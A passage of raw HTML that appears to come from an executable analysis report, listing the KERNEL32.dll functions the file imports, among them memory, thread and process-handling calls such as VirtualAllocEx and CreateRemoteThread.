0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualProtect</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualQuery</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WriteProcessMemory</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LCMapStringW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LoadLibraryW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleHandleA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ExitProcess</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetUnhandledExceptionFilter</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ExitThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemDirectoryW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetVolumeInformationW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetComputerNameW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FreeLibrary</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentProcess</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentProcessId</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentThreadId</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleHandleW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetHandleInformation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemDirectoryA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GlobalFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.Sleep</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetStdHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFileType</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.MultiByteToWideChar</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FindClose</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WideCharToMultiByte</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CloseHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.QueryPerformanceCounter</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetTickCount</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GlobalMemoryStatus</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FlushConsoleInputBuffer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.InitializeCriticalSectionAndSpinCount</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.UnhandledExceptionFilter</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlVirtualUnwind</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlLookupFunctionEntry</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlCaptureContext</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FreeEnvironmentStringsW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetEnvironmentVariableA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FileTimeToLocalFileTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFileInformationByHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.PeekNamedPipe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFullPathNameW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentDirectoryW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapSize</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetEndOfFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LoadLibraryA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFileSize</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetEnvironmentStringsW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleFileNameA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetStartupInfoW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.DeleteCriticalSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCPInfo</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetOEMCP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetACP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.IsValidCodePage</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WriteFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReadFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateFileA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TerminateThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ResumeThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetEvent</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReleaseMutex</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WaitForSingleObject</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateMutexA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateEventA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WaitForMultipleObjects</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SystemTimeToFileTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualAllocEx</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.OpenProcess</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.DuplicateHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.OpenThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SuspendThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetVersionExA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateToolhelp32Snapshot</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.Thread32First</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.Thread32Next</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateRemoteThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetThreadId</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 